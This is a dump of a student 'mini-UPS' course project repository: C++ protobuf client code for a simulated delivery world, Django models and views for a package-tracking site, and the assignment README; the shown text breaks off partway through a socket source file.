world->goPickUp(truckIdAssigned, req.pickup(i).wh_id(), mySeqNum);\n insert_sequence_num(C, to_string(mySeqNum), \"False\");\n ++mySeqNum;\n // ++myPackageNum;\n }\n }\n\n if (req.ack_size() != 0) {\n for (int i = 0; i < req.ack_size(); i++) {\n cout << \"ack from amazon\" << endl;\n cout << req.ack(i) << endl;\n update_acked_of_seqnum(C, to_string(req.ack(i)), true);\n }\n }\n\n // message DeliveryRequest{\n // required int64 seqnum = 1;\n // required int64 tracknum = 2;\n // }\n\n if (req.delivery_size() != 0) {\n for (int i = 0; i < req.delivery_size(); i++) {\n cout << \"delivery request from amazon\" << endl;\n cout << req.delivery(i).seqnum() << endl;\n cout << req.delivery(i).tracknum() << endl;\n // local\n lock_guard<mutex> lck(mtx);\n amazon->sendAck(req.delivery(i).seqnum());\n // packageExist(connection * C, string packageid)\n if (!packageExist(C, to_string(req.delivery(i).tracknum()))) {\n\tamazon->sendError(\"The track number does not exist\", req.delivery(i).seqnum(), mySeqNum);\n\tinsert_sequence_num(C, to_string(mySeqNum), \"False\");\n\t++mySeqNum;\n\tcontinue;\n }\n string tempId = get_truck_id_for_a_particular_package(C, to_string(req.delivery(i).tracknum()));\n update_status_of_package(C, to_string(req.delivery(i).tracknum()), PACKAGE_DELIVERING);\n update_truck_status(C, tempId, TRUCK_DELIVERING);\n // remote\n // todo : Select xPosition, yPostion from Package where PackageId = x\n int x = stoi(get_xposition_of_a_package(C, to_string(req.delivery(i).tracknum())));\n int y = stoi(get_yposition_of_a_package(C, to_string(req.delivery(i).tracknum())));\n // worldMsg::goDeliver(int packageid, int x, int y, int truckid, int seqnum)\n // cout << \"-命运---------------\" << endl;\n // cout << req.delivery(i).tracknum() << endl;\n // cout << x << endl;\n // cout << y << endl;\n // cout << stoi(tempId) << endl;\n // cout << mySeqNum << endl;\n world->goDeliver(req.delivery(i).tracknum(), x, y, stoi(tempId), mySeqNum);\n insert_sequence_num(C, to_string(mySeqNum), \"False\");\n ++mySeqNum;\n }\n } \n}\n \nvoid updateAddress() {\n amazonMsg * amazon = amazonMsg::getInstance();\n worldMsg * world = worldMsg::getInstance(WORLD_HOST, WORLD_PORT);\n while (true) {\n //this_thread::sleep_for(chrono::milliseconds(3000)); \n vector<vector<string>> my_vec(1000);\n // package id, x, y\n get_parameter_based_on_dest(C, my_vec); // handled required to updated\n if (my_vec.size() == 0) {\n\tcontinue;\n }\n lock_guard<mutex> lck(mtx);\n for (unsigned i = 0; i < my_vec.size(); i++) {\n\tfor (int j = 0; j < 3; j++) {\n\t //world->updateDestination(mySeqNum, stoi(my_vec[i][0]), stoi(my_vec[i][1]), stoi(my_vec[i][2]));\n\t int findTruckId = stoi(get_truck_id_for_a_particular_package(C, my_vec[i][0]));\n\t string curStatus = get_package_status(C, my_vec[i][0]);\n\t if (curStatus == \"DD\" ) {\n\t cout << \"Already Delivered : Update Address Failed\";\n\t continue;\n\t }\n\t if (curStatus == \"DG\") {\n\t world->goDeliver(stoi(my_vec[i][0]), stoi(my_vec[i][1]), stoi(my_vec[i][2]), findTruckId, mySeqNum);\n\t insert_sequence_num(C, to_string(mySeqNum), \"False\");\n\t ++mySeqNum;\n\t }\n\t amazon->updateDestination(mySeqNum, stoi(my_vec[i][0]), stoi(my_vec[i][1]), stoi(my_vec[i][2]));\n\t insert_sequence_num(C, to_string(mySeqNum), \"False\");\n\t ++mySeqNum;\n\t}\n }\n }\n}\n\nvoid recvAdreUpdatedACK() {\n amazonMsg * amazon = amazonMsg::getInstance();\n while (true) {\n A2UResponse response;\n amazon->receiveDestUpdatedRes(response); \n if (response.error_size() != 0) {\n for (int i = 0; i < response.error_size(); i++) {\n cout << \"error message from ACKACK\" << endl;\n cout << response.error(i).err() << endl;\n cout << response.error(i).originseqnum() << endl;\n cout << response.error(i).seqnum() << endl;\n amazon->sendAck22222(response.error(i).seqnum());\n }\n }\n\n if (response.ack_size() != 0) {\n for (int i = 0; i < response.ack_size(); i++) {\n cout << \"ack from ACKACK\" << endl;\n cout << response.ack(i) << endl;\n update_acked_of_seqnum(C, to_string(response.ack(i)), true);\n }\n } \n }\n}\n\n\n\n" }, { "alpha_fraction": 0.6050826907157898, "alphanum_fraction": 0.6115369200706482, "avg_line_length": 30.37974739074707, "blob_id": "c793e251d86f9c4851cad4d2a4e0372ffa76d524", "content_id": "c894759cbfe15f77e45dca9271b99b61cacb73bf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2479, "license_type": "no_license", "max_line_length": 80, "num_lines": 79, "path": "/Django-App/web-app/upsApp/models.py", "repo_name": "rijish45/UPS", "src_encoding": "UTF-8", "text": "from django.db import models\n\n# Create your models here.\n\nfrom django.contrib.auth.models import User\n\nclass Truck(models.Model):\n truckId = models.PositiveIntegerField(blank = False, primary_key = True)\n STATUS_CHOICE = (\n ('ID', 'idle'),\n ('TR', 'traveling'),\n ('AW', 'arrive warehouse'),\n ('LO', 'loading'),\n ('DE', 'delivering'),\n )\n status = models.CharField (\n max_length = 20, \n choices = STATUS_CHOICE, \n default = 'ID',\n )\n def __str__(self):\n return \"the truckId of is package is %s\" % (self.truckId)\n\n\nclass Package(models.Model):\n packageId = models.PositiveIntegerField(blank = False, primary_key = True)\n xPosition = models.IntegerField(default = 0, blank = False, null = True)\n yPosition = models.IntegerField(default = 0, blank = False, null = True)\n item = models.CharField(max_length = 200, blank = True, null = True)\n whid = models.PositiveIntegerField(default = 0, blank = False)\n whxPosition = models.IntegerField(default = 0, blank = False)\n whyPosition = models.IntegerField(default = 0, blank = False)\n destRequiredUpdated = models.BooleanField(default = False)\n owner = models.ForeignKey (\n User,\n related_name = 'owner_package_set',\n on_delete = models.SET_NULL,\n blank = True,\n null = True,\n )\n truck = models.ForeignKey (\n Truck, \n blank = True,\n null = True,\n on_delete = models.SET_NULL,\n related_name = 'truck_package_set'\n )\n STATUS_CHOICE = (\n ('LG', 'loading'),\n ('LD', 'loaded'),\n ('DG', 'delivering'),\n ('DD', 'delivered'),\n )\n status = models.CharField (\n max_length = 20, \n choices = STATUS_CHOICE, \n default = 'DG',\n )\n def __str__(self):\n return \"the packageId of is package is %s\" % (self.packageId)\n\n\n\nclass current_world(models.Model):\n name = models.CharField(max_length=30,null=True,default=\"current_world\")\n worldid = models.CharField(max_length=30,null=True)\n\n\nclass sequence_number(models.Model):\n sequence_id = models.PositiveIntegerField(blank = False, primary_key = True)\n ackedornot = models.BooleanField(default = False)\n\nclass order_table(models.Model):\n order_id = models.PositiveIntegerField(blank = False, primary_key = True);\n package_num = models.OneToOneField(\n Package,\n on_delete = models.CASCADE,\n unique = True\n )\n" }, { "alpha_fraction": 0.6438679099082947, "alphanum_fraction": 0.6627358198165894, "avg_line_length": 16.66666603088379, "blob_id": "eab823f65ed74f50cc904e1f7deeea51621db970", "content_id": "12792c32d8dc127f62d4b4b0b0cff157b922cdf8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 424, "license_type": "no_license", "max_line_length": 33, "num_lines": 24, "path": "/Server-App/server/main.cpp", "repo_name": "rijish45/UPS", "src_encoding": "UTF-8", "text": "#include \"socket.hpp\"\n#include \"worldMsg.hpp\"\n#include \"thread.hpp\"\n#include <cstdlib>\n#include <cstdio>\n#include <iostream>\n#include <thread> \n\nusing namespace std;\n\nint main() {\n setUpEnvironment(); \n thread th1(worldSide); \n thread th2(amazonSide);\n thread th3(updateAddress);\n thread th4(recvAdreUpdatedACK);\n th1.join();\n th2.join();\n th3.join();\n th4.join();\n cout << \"Hello\" << endl;\n while (true) {\n }\n}\n" }, { "alpha_fraction": 0.7749814391136169, "alphanum_fraction": 0.7786980867385864, "avg_line_length": 69.79698944091797, "blob_id": "9eb1c384974d25c58c3facaf1474115850edff15", "content_id": "cbe8bf2a0b6151ad56547455057787e75c2ae13a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 9497, "license_type": "no_license", "max_line_length": 186, "num_lines": 133, "path": "/README.md", "repo_name": "rijish45/UPS", "src_encoding": "UTF-8", "text": "# UPS\n\nFor this project, you will either be doing “mini-Amazon” (an online store) or “mini-UPS” (a\nshipping website). If you are doing Amazon, you will have to make your system work with the\nUPS systems in your interoperability group (IG)—2 groups doing Amazon and 2 groups doing UPS.\n\nThe “World”\n----------\nSince you won’t have access to real warehouses and trucks, your code will interact with a\nsimulated world provided for you. You will connect to the simulation server (port 12345 for UPS,\nport 23456 for Amazon), and send commands and receive notifications.\nThe messages you can send and receive are in the .proto files (amazon.proto and ups.proto)\nthat will be provided. Notice that all messages either start with A or U to indicate which part they\nbelong to.\nThe server supports different worlds (identified by a 64-bit number). You may create as many\nworlds as you want. There is presently no authentication on the worlds, so please only use your\nown. To create a new world for a pair of Amazon and UPS, UPS should send a Uconnect request\nwithout specifying a worldid number, so that the World Simulator would create one and return\nits ID in UConnected response. Note only UPS can create a new world and only when you want\nto create a new world do you leave the worldid blank.\nEach world is comprised of a Cartesian coordinate grid where “addresses” are integer coordinates (so you will deliver a package to e.g., (2, 4)). The world contains trucks (controlled by\nUPS) and warehouses (controlled by Amazon). These have to work together to deliver packages.\nThe basic flow is that you send an A/UConnect message with the worldid that you want and\nreceive an A/UConnected response. Note only ONE Amazon and ONE UPS is allowed to connect\nto a world at the same. Upon successful connection, the result string in A/UConnected will\nbe “connected!”, otherwise it will be an error message starting with “error:”. Make sure your\nresult string is “connected!” before proceeding to any further actions. Once you have\nreceived this response, you may send A/UCommands and receive A/Responses. You should not\nsend any other message, nor expect to receive any – all of the details are embedded in the\nA/UCommands/Responses.\nA/UCommands include two common options: simspeed and disconnect. You can adjust the\nsimulation speed (higher numbers make things happen more quickly in the world). Simulation\nspeed has a default value of 100 and it’s consistent once you specify it until you change it into\nanother value. Note that the simulation speed only affects future events. If you set\ndisconnect to true in a command, the server will finish processing whatever it is currently \nworking on (your current A/UCommands), then send a response with finished = true,\nand close the connection.\nA/UCommands and A/UResponses also implement ack numbers to avoid losing an in-flight\nmessage. The ack mechanism works as follows. For each request inside A/UCommands, there’s\na seqnum (you should keep track of the incrementing of seqnum coming from your side). When\nWorld Simulator receives commands from your side, it will check the seqnum of each request.\nThen it will process the request and return responses with acks of those seqnums. The same\nthing happens when World Simulator send you responses, which means if you don’t return ack,\nWorld Simulator will send the same responses for multiple times. Don’t assume World Simulator\nreceives all of the requests in your A/UCommands until you receive those acks.\nNote: simspeed is only for testing/debugging. You MUST NOT rely on a particular simspeed for\nthe correctness of your program. When testing/debugging, if you want to try a large number of\nactions quickly, you might set it high. Likewise, if you wish to exercise particular timing-related\nconditions, you might set it slow. Your program MUST work correctly at ANY simspeed when the\nTAs use. They will have a version of the world server which ignores simspeed commands that you\nsend and allows them to set the speed directly.\n\n\nAmazon Commands details: (note all commands include a sequence number for\nacknowledgement as described above)\n--------------------------------------------------------------------------\n\n1. **buy** You can ask for more of some products to be delivered to a warehouse. Specify item id,\ndescription (any text) and the quantity you want. If this product has never been seen before,\nit will be created. If the product has been seen before, you SHOULD provide the same\ndescription (if you use different descriptions for the same product id, the behavior is\nundefined). NOTE: buying new stock does not involve UPS.\n2. **topack** Pack a shipment for delivery. You will be notified when it is ready. The ware- house that\nyou request to pack the shipment MUST have sufficient inventory (and the inventory will be\nreduced accordingly).\n3. **load** Load a shipment on to a truck. In order for this to succeed, the shipment MUST be packed\n(and you must have received a ready notification) AND the truck MUST be at the warehouse,\nready to receive the shipment (the shipper must have sent them to pickup and they must\nhave received notification of completion).\nqueries ask the status of a package by specifying the packageid. Note you can do query at any\ntime.\n\nAmazon Response details: \n-----------------------\n1. **arrived** - When you buy, you will later get a notification that your orders have arrived. At this time,\nyou should update your records of what is in stock and may use the goods described in this\nmessage to fulfill orders.\n2. **ready** - Notification that packing is complete\n3. **loaded** - Notification that you have finished loading a shipment onto a truck\npackagestatus tell the current status of one package that you queried. Possible package status:\npacking, packed, loading, loaded, delivering, delivered.\n4. **error** - indicates that you failed to meet any of the MUST requirements specified at “Amazon\nCommands details” above. Read the err string carefully for more information.\n\n\nUPS Command details:\n-------------------\n1. **deliveries** - Once a package has been loaded, you can issue this command to send the truck to\ndeliver it to a particular location. Note that you MAY pickup other packages before making\ndeliveries. You MAY send more deliveries requests while the truck is delivering other\npackages. You MAY even change the destination of a package by sending a delivery request\nagain before it arrives its destination. World Simulator allows idle truck carrying undelivered\npackages. If you specify multiple deliveries at once, they will be performed in the order you\nlist them in the command.\n2. **pickups** - Send a truck to a warehouse to pick up a package. The truck need not have an “idle”\nstatus; it can also have an “arrive warehouse” or “delivering” status. If a truck receives\npickups requests in the middle of a delivering, it will immediately quit the current delivery\nand turn to the specified warehouse. Later whenever the truck has a “delivering” status\nagain, it always starts from where it quits. The package need not be ready to issue this\ncommand. While the truck is in route, it is busy and cannot be given other commands.\n\n3. **queries** - ask the status of a truck by specifying truckid. Note you can do query at any time.\n\nUPS Response details:\n--------------------\n\n1. **completions** - You will receive this notification when either (a) a truck reaches the warehouse you\nsent it to (with a pickup command) and is ready to load a package or (b) a truck has finished\nall of its deliveries (that you sent it to make with a deliveries command).\nAt this point the truck may be given other instructions. Note that the completion tells you\nthe current location of the truck. \n2. **delivered** - You will receive this notification when each package is delivered. Note that when each\npackage is delivered, a delivered response will be sent. When all deliveries are finished,\nyou will receive a completions response.\n3. **truckstatustell** - the current status of a truck that you queried. Possible truck status: idle, traveling\n(when receives pickups requests and is on its way to warehouse), arrive warehouse, loading\n(loading package, after loading package finish, go back to “arrive warehouse” status),\ndelivering (when finished all deliver job, go to status “idle”).\n4. **error** indicates that you failed to meet any of the MUST requirements specified at “UPS\nCommands details” above. Read the err string carefully for more information.\n\n\nNote World Simulator has a time-out value set to be 10 mins, if you found that you lose the\nconnection, don’t panic, just connect again.\nthat the world server’s replies are asynchronous. You may send several requests and receive the\nreplies many minutes later. You should use appropriate identifiers in the responses to figure out\nwhat request a message is in response to. You also MUST NOT wait for the response to return a\nweb page – if the response takes a few minutes, the browser will time out.\nYou MAY wish to separate the handling of world server communication from the handling of the\nweb front end (hint: good idea). You could even go so far as placing the web server in a different\nDocker container from the daemon which interacts with the world server. In such a design, both\nprograms can communicate through a common postgres database. You might even write these\npieces of software in different languages. \n" }, { "alpha_fraction": 0.6932404041290283, "alphanum_fraction": 0.6959684491157532, "avg_line_length": 31.663366317749023, "blob_id": "2f216889fb944529f6d1713864484f303a5288c3", "content_id": "93105dc91855c90542b104c60a1a7a725a2cb702", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3301, "license_type": "no_license", "max_line_length": 150, "num_lines": 101, "path": "/Server-App/server/worldMsg.hpp", "repo_name": "rijish45/UPS", "src_encoding": "UTF-8", "text": "#ifndef __WORLDMSG__\n#define __WORLDMSG__\n\n#include <thread>\n#include <chrono>\n#include \"world_ups.pb.h\"\n#include \"socket.hpp\"\n#include <string.h>\n#include <cstdlib>\n#include <cstdio>\n#include <google/protobuf/message.h>\n#include <google/protobuf/descriptor.h>\n#include <google/protobuf/io/zero_copy_stream_impl.h>\n#include <google/protobuf/io/coded_stream.h>\n#include <google/protobuf/io/zero_copy_stream_impl_lite.h>\n#include \"handle_requests.hpp\"\n#include <pqxx/pqxx>\n\nusing namespace std;\n\nclass worldMsg {\n static Connector connector;\n static google::protobuf::io::FileOutputStream * out;\n static google::protobuf::io::FileInputStream * in;\n static worldMsg * instance;\n static mutex mtx_in;\n static mutex mtx_out;\n // static worldMsg * mySelfPtr; \npublic:\n static worldMsg * getInstance(const char * host, const char * port);\nprivate: \n worldMsg() {} // Constructor? (the {} brackets) are needed here.\n void initizeTrucks(UConnect & uconnect,int number, int x, int y, connection * C);\npublic:\n worldMsg(worldMsg const&) = delete;\n void operator=(worldMsg const&) = delete;\n bool createWorld(bool isAmazon, google::protobuf::int64 worldId, bool isCreate, int numberTrucks, int x, int y, int & newCreatedId, connection * C);\n void goPickUp(int truckId, int whid, int seqnum);\n void goDeliver(int packageid, int x, int y, int truckid, int seqnum);\n void goQuery(int truckid, int seqnum);\n void changeSpeed(int semspeed);\n void sendAck(int ack);\n void disconnect(bool wantDisconnect);\n void recvResponse(UResponses & response);\n\n \n //this is adpated from code that a Google engineer posted online\n template<typename T> bool sendMesgTo(const T & message,\n\t\t google::protobuf::io::FileOutputStream *out) {\n lock_guard<mutex> lck(mtx_out);\n \n\n { //extra scope: make output go away before out->Flush()\n // We create a new coded stream for each message.\n // Don’t worry, this is fast.\n\n google::protobuf::io::CodedOutputStream output(out);\n // Write the size.\n const int size = message.ByteSize();\n output.WriteVarint32(size);\n uint8_t* buffer = output.GetDirectBufferForNBytesAndAdvance(size);\n if (buffer != NULL) {\n\t// Optimization: The message fits in one buffer, so use the faster\n\t// direct-to-array serialization path.\n\tmessage.SerializeWithCachedSizesToArray(buffer);\n } else {\n\t// Slightly-slower path when the message is multiple buffers.\n\tmessage.SerializeWithCachedSizes(&output);\n\tif (output.HadError()) {\n\t return false;\n\t}\n }\n }\n out->Flush();\n return true;\n }\n\n //this is adpated from code that a Google engineer posted online\n template<typename T> bool recvMesgFrom(T & message,\n\t\t\t google::protobuf::io::FileInputStream * in ){\n lock_guard<mutex> lck(mtx_in);\n google::protobuf::io::CodedInputStream input(in);\n uint32_t size;\n if (!input.ReadVarint32(&size)) {\n return false;\n }\n // Tell the stream not to read beyond that size.\n google::protobuf::io::CodedInputStream::Limit limit = input.PushLimit(size);\n // Parse the message.\n if (!message.MergeFromCodedStream(&input)) {\n return false;\n }\n if (!input.ConsumedEntireMessage()) {\n return false;\n }\n // Release the limit.\n input.PopLimit(limit);\n return true;\n }\n};\n#endif\n" }, { "alpha_fraction": 0.6188271641731262, "alphanum_fraction": 0.6234567761421204, "avg_line_length": 28.5, "blob_id": "084683a7d2a39e93410f49eeef30e25d21ae8ce2", "content_id": "02a91870086772a20c7fb9378bbf09cd78d844b3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 648, "license_type": "no_license", "max_line_length": 70, "num_lines": 22, "path": "/Django-App/web-app/accounts/forms.py", "repo_name": "rijish45/UPS", "src_encoding": "UTF-8", "text": "from django.contrib.auth.models import User\nfrom django import forms\n\nclass UserForm(forms.ModelForm):\n password = forms.CharField(widget = forms.PasswordInput)\n\n class Meta:\n model = User\n fields = ['username', 'password']\n help_texts = {\n 'username': ('Please create your username'),\n }\n\n def clean_password(self):\n password = self.cleaned_data.get('password')\n\n if len(password) < 6:\n raise forms.ValidationError(\"Your password is too short.\")\n elif len(password) > 20:\n raise forms.ValidationError(\"Your password is too long.\")\n\n return password" }, { "alpha_fraction": 0.7229007482528687, "alphanum_fraction": 0.7244274616241455, "avg_line_length": 27.478260040283203, "blob_id": "ca728361aff8dec051fcfeed1cca94d889ab5a8e", "content_id": "e0aedfc3766be00f10005744d5c5b4117ea3392a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1310, "license_type": "no_license", "max_line_length": 67, "num_lines": 46, "path": "/Django-App/web-app/upsApp/views.py", "repo_name": "rijish45/UPS", "src_encoding": "UTF-8", "text": "import operator\nfrom django.db.models import Q\nfrom functools import reduce\nfrom django.shortcuts import render\nfrom django.views import generic\nfrom .models import Package, Truck\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.views.generic.edit import UpdateView\nfrom django.urls import reverse_lazy\n\n\nclass PackageListView(LoginRequiredMixin, generic.ListView):\n model = Package\n\n def get_queryset(self):\n return Package.objects.filter(owner=self.request.user)\n\n\nclass ShipmentListView(generic.ListView):\n model = Package\n template_name_suffix = '_all_list'\n\n\nclass PackageUpdate(LoginRequiredMixin, UpdateView):\n model = Package\n fields = ['xPosition', 'yPosition', 'destRequiredUpdated']\n template_name_suffix = '_update_form'\n success_url = reverse_lazy('upsApp:packages')\n\n\nclass ShipmentSearchListView(ShipmentListView):\n \"\"\"\n Display a Blog List page filtered by the search query.\n \"\"\"\n paginate_by = 10\n\n def get_queryset(self):\n result = super(ShipmentSearchListView, self).get_queryset()\n\n query = self.request.GET.get('q')\n if query:\n # query_list = query.split()\n result = result.filter(packageId=query)\n\n return result\n" }, { "alpha_fraction": 0.6011844277381897, "alphanum_fraction": 0.6106598973274231, "avg_line_length": 29.266666412353516, "blob_id": "4002f2efa595169ac09d141f148b3c3b3e6bd17f", "content_id": "a3fbefb050a99b98482ffdeaa8d68a36052b5141", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 5910, "license_type": "no_license", "max_line_length": 93, "num_lines": 195, "path": "/Server-App/server/worldMsg.cpp", "repo_name": "rijish45/UPS", "src_encoding": "UTF-8", "text": "#include \"worldMsg.hpp\"\n \nConnector worldMsg::connector;\nworldMsg * worldMsg::instance = 0;\ngoogle::protobuf::io::FileOutputStream * worldMsg::out;\ngoogle::protobuf::io::FileInputStream * worldMsg::in;\nmutex worldMsg::mtx_in;\nmutex worldMsg::mtx_out;\n\nworldMsg * worldMsg::getInstance(const char * host, const char * port) {\n if (instance == 0) {\n instance = new worldMsg();\n cout << host << endl;\n cout << port << endl;\n connector = move(Connector(host, port));\n out = new google::protobuf::io::FileOutputStream(connector.getSocket());\n in = new google::protobuf::io::FileInputStream(connector.getSocket());\n }\n // Instantiated on first use.\n return instance;\n}\n\n// message UInitTruck{\n// required int32 id = 1;\n// required int32 x=2;\n// required int32 y=3;\n// }\n\n// message UConnect{\n// optional int64 worldid = 1;\n// repeated UInitTruck trucks=2;\n// required bool isAmazon = 3;\n// }\n \nbool worldMsg::createWorld(bool isAmazon,\n\t\t\t google::protobuf::int64 worldId,\n\t\t\t bool isCreate,\n\t\t\t int numberTrucks,\n\t\t\t int x,\n\t\t\t int y,\n\t\t\t int & newCreatedId,\n\t\t\t connection * C) {\n UConnect uconnect;\n if (!isCreate) {\n uconnect.set_worldid(worldId);\n } \n uconnect.set_isamazon(isAmazon);\n initizeTrucks(uconnect, numberTrucks, x, y, C);\n \n sendMesgTo(uconnect, out);\n UConnected response;\n recvMesgFrom(response, in);\n cout << \"Message is \" << endl;\n cout << response.DebugString();\n if (response.result() == \"connected!\") {\n newCreatedId = response.worldid();\n return true;\n }\n return false;\n}\n\nvoid worldMsg::goPickUp(int truckId, int whid, int seqnum) {\n UCommands ucommand;\n UGoPickup * ugopickup = ucommand.add_pickups();\n ugopickup->set_truckid(truckId);\n ugopickup->set_whid(whid);\n ugopickup->set_seqnum(seqnum);\n sendMesgTo(ucommand, out);\n}\n\n// message UDeliveryLocation{\n// required int64 packageid = 1;\n// required int32 x = 2;\n// required int32 y = 3;\n// }\n\n// message UGoDeliver{\n// required int32 truckid = 1;\n// repeated UDeliveryLocation packages = 2;\n// required int64 seqnum = 3;\n// }\n\nvoid worldMsg::goDeliver(int packageid, int x, int y, int truckid, int seqnum) {\n UCommands ucommand;\n UGoDeliver * ugodeliever = ucommand.add_deliveries();\n ugodeliever->set_truckid(truckid);\n UDeliveryLocation * package = ugodeliever->add_packages();\n package->set_packageid(packageid);\n package->set_x(x);\n package->set_y(y);\n ugodeliever->set_seqnum(seqnum);\n sendMesgTo(ucommand, this->out);\n}\n\nvoid worldMsg::goQuery(int truckid, int seqnum) {\n UCommands ucommand;\n UQuery * uquery = ucommand.add_queries();\n uquery->set_truckid(truckid);\n uquery->set_seqnum(seqnum);\n sendMesgTo(ucommand, this->out);\n}\n\nvoid worldMsg::changeSpeed(int simspeed) {\n UCommands ucommand;\n ucommand.set_simspeed(simspeed);\n sendMesgTo(ucommand, this->out);\n}\n\nvoid worldMsg::disconnect(bool wantDisconnect) {\n UCommands ucommand;\n ucommand.set_disconnect(wantDisconnect);\n sendMesgTo(ucommand, out);\n}\n\nvoid worldMsg::sendAck(int ack) {\n UCommands ucommand;\n ucommand.add_acks(ack);\n sendMesgTo(ucommand, out);\n}\n\nvoid worldMsg::initizeTrucks(UConnect & uconnect, int number, int x, int y, connection * C) {\n for (int i = 0; i < number; i++) {\n UInitTruck * newTruck = uconnect.add_trucks();\n newTruck->set_id(i);\n newTruck->set_x(x);\n newTruck->set_y(y);\n cout << \"debug information: Truck \" << i << endl;\n cout << newTruck->DebugString();\n insert_truck(C, to_string(i), \"ID\");\n }\n}\n\n\nvoid worldMsg::recvResponse(UResponses & response) {\n this_thread::sleep_for(std::chrono::milliseconds(1000));\n // UResponses response;\n recvMesgFrom(response, in);\n // if (response.completions_size() != 0) {\n // for (int i = 0; i < response.completions_size(); i++) {\n // cout << \"completions sent back \" << endl;\n // cout << response.completions(i).truckid() << endl;\n // cout << response.completions(i).x() << endl;\n // cout << response.completions(i).y() << endl;\n // cout << response.completions(i).status() << endl;\n // cout << response.completions(i).seqnum() << endl;\n // }\n // }\n \n // if (response.delivered_size() != 0) {\n // for (int i = 0; i < response.delivered_size(); i++) {\n // // update\n // // update(packageid, status);\n // cout << \"delievered sent back \" << endl;\n // cout << response.delivered(i).truckid() << endl;\n // cout << response.delivered(i).packageid() << endl;\n // cout << response.delivered(i).seqnum() << endl;\n // }\n // }\n \n // if (response.truckstatus_size() != 0) {\n // for (int i = 0; i < response.truckstatus_size(); i++) {\n // cout << \"truck status send back\" << endl;\n // cout << response.truckstatus(i).truckid() << endl;\n // cout << response.truckstatus(i).status() << endl;\n // cout << response.truckstatus(i).x() << endl;\n // cout << response.truckstatus(i).y() << endl;\n // cout << response.truckstatus(i).seqnum() << endl;\n // // // update(int truckId, int x, int y, string status); \n // }\n // }\n\n // // message UErr{\n // // required string err = 1;\n // // required int64 originseqnum = 2;\n // // required int64 seqnum = 3;\n // // } \n // if (response.error_size() != 0) {\n // for (int i = 0; i < response.error_size(); i++) {\n // cout << \"error sent back \" << endl;\n // cout << response.error(i).err() << endl;\n // cout << response.error(i).originseqnum() << endl;\n // cout << response.error(i).seqnum() << endl;\n // }\n // }\n // if (response.has_finished()) {\n // cout << \"finished snet back \" << response.finished() << endl;\n // }\n // if (response.acks_size() != 0) {\n // for (int i = 0; i < response.acks_size(); i++) {\n // cout << \"ack sent back\" << endl;\n // cout << response.acks(i) << endl;\n // }\n // }\n \n}\n\n\n\n\n\n\n\n\n" }, { "alpha_fraction": 0.5871760845184326, "alphanum_fraction": 0.591567873954773, "avg_line_length": 26.518293380737305, "blob_id": "9c347eaa59fdd35306f40a52affa344078cb743a", "content_id": "74cb3ef0c653c7d026b5bf2172a9d7fe1e48f9a1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4554, "license_type": "no_license", "max_line_length": 99, "num_lines": 164, "path": "/Server-App/server/socket.cpp", "repo_name": "rijish45/UPS", "src_encoding": "UTF-8", "text": "#include \"socket.hpp\"\n\nSocket::Socket() : socket_fd(-1) {}\n\nSocket::Socket(int __socket_fd) : socket_fd(__socket_fd) {}\n\nSocket::Socket(Socket && rhs) noexcept {\n socket_fd = exchange(rhs.socket_fd, -1); // avoid double closing socket\n}\n\nSocket& Socket::operator=(Socket && rhs) noexcept {\n if (this != &rhs) {\n std::swap(socket_fd, rhs.socket_fd);\n }\n return * this;\n}\n\n\nbool Socket::isValid() {\n return socket_fd > -1;\n}\n\n\nSocket::~Socket() {\n if (socket_fd > -1) {\n cout << \"closing socket \" << this->socket_fd << endl;\n auto status = TEMP_FAILURE_RETRY(close(socket_fd));\n if (status == -1) {\n perror(\"Close Socket Failed\");\n } \n }\n}\n\nListener::Listener(const char * _port) : Socket(), port(_port) {\n int status;\n struct addrinfo host_info;\n struct addrinfo * host_info_list;\n const char * hostname = NULL;\n\n memset(&host_info, 0, sizeof(host_info));\n host_info.ai_family = AF_UNSPEC;\n host_info.ai_socktype = SOCK_STREAM;\n host_info.ai_flags = AI_PASSIVE;\n\n status = getaddrinfo(hostname, port, &host_info, &host_info_list);\n\n \n if (status != 0) {\n cerr << \"Error: cannot get address info for host\" << endl;\n cerr << \" (\" << hostname << \",\" << port << \")\" << endl;\n // throw exception\n \n }\n\n socket_fd = socket(host_info_list->ai_family,\n\t\t host_info_list->ai_socktype,\n\t\t host_info_list->ai_protocol);\n\n if (socket_fd == -1) {\n cerr << \"Error: cannot create socket\" << endl;\n cerr << \" (\" << hostname << \",\" << port << \")\" << endl;\n // throw exception \n }\n\n int yes = 1;\n status = setsockopt(socket_fd, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(int));\n status = bind(socket_fd, host_info_list->ai_addr, host_info_list->ai_addrlen);\n if (status == -1) {\n cerr << \"Error: cannot bind socket\" << endl;\n cerr << \" (\" << hostname << \",\" << port << \")\" << endl;\n // throw exception\n }\n\n status = listen(socket_fd, 100);\n if (status == -1) {\n cerr << \"Error: cannot elisten on socket\" << endl;\n cerr << \" (\" << hostname << \",\" << port << \")\" << endl;\n // throw exception\n }\n freeaddrinfo(host_info_list);\n}\n\nListener::~Listener(){}\n\nSocket Listener::Accept() {\n struct sockaddr_storage socket_addr;\n socklen_t socket_addr_len = sizeof(socket_addr);\n int client_connection_fd;\n // throw 7;\n client_connection_fd = accept(socket_fd, (struct sockaddr *)&socket_addr, &socket_addr_len);\n // cout << client_connection_fd << endl;\n if (client_connection_fd == -1) {\n cerr << \"Error: cannot accept connection on socket\" << endl;\n // throw exception\n }\n return move(Socket(client_connection_fd));\n}\n\nListener::Listener(Listener && rhs) noexcept {\n Socket(move(rhs));\n swap(this->port, rhs.port);\n}\n\nListener & Listener::operator=(Listener && rhs) noexcept {\n if (this != &rhs) {\n Socket::operator=(std::move(rhs));\n swap(this->port, rhs.port);\n }\n return *this;\n}\n\nConnector::Connector(const char * _host, const char * _port) : Socket(), host(_host), port(_port) {\n int status;\n struct addrinfo host_info;\n struct addrinfo *host_info_list;\n memset(&host_info, 0, sizeof(host_info));\n host_info.ai_family = 